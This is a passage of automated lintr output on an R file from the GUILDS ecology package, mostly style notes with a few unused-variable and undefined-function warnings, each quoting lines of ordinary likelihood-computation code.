^\n```\n[R/Condition.R:56:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:56:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:62:18:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:62:54:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:66:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:69:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin\n      ^\n```\n[R/Condition.R:70:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin\n      ^\n```\n[R/Condition.R:71:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0\n      ^\n```\n[R/Condition.R:72:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1\n      ^\n```\n[R/Condition.R:73:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps\n     ^\n```\n[R/Condition.R:75:2:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n ^~~~~~~~~~\n```\n[R/Condition.R:75:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n             ^\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:54:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:77:2:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n ^~~~~~~~~~~\n```\n[R/Condition.R:77:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n             ^\n```\n[R/Condition.R:77:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:52:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n                                                   ^\n```\n[R/Condition.R:85:32:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L85) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g, c(eps,xmax)))$root\n                               ^\n```\n[R/Condition.R:88:4:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:88:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:94:26:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L94) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot( h,c( xmax, 1 - eps)))$root\n                         ^\n```\n[R/Condition.R:97:2:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:104:24:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:111:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:118:3:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L118) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L118) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L119) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:119:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L119) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:120:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L120) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:121:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:122:3:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L122) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:122:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L122) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:123:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:126:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:128:55:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      ^\n```\n[R/Condition.R:130:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L130) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:130:45:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:131:50:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:133:50:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L133) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:133:51:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L133) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:134:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:134:45:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:137:49:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L137) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                            ~~~~^\n```\n[R/Condition.R:137:50:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L137) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                                 ^\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L142) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:143:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L145) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:151:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:152:72:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L152) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:152:73:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        ^~\n```\n[R/Condition.R:153:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L153) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L159) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:162:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:163:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L163) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:167:18:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L167) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:167:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:168:13:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:168:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:168:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:168:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:170:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:171:9:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:60:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L171) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n                                                           ^\n```\n[R/Condition.R:174:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L174) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L175) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L180) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L180) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:46:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:53:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                             method, \n                                                    ^\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L184) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L184) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L185) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L185) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:186:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:189:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L189) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/Condition.R:190:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L190) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:191:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L191) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/Condition.R:191:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L191) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/Condition.R:192:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L192) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:195:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L195) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x2)) freq_y[i] <- x2[[i]]\n     ^\n```\n[R/Condition.R:196:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:197:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L197) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n             ^\n```\n[R/Condition.R:197:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L197) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n                ^\n```\n[R/Condition.R:199:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L199) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:200:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L200) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:201:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L201) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:202:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L202) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:203:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L203) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:206:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  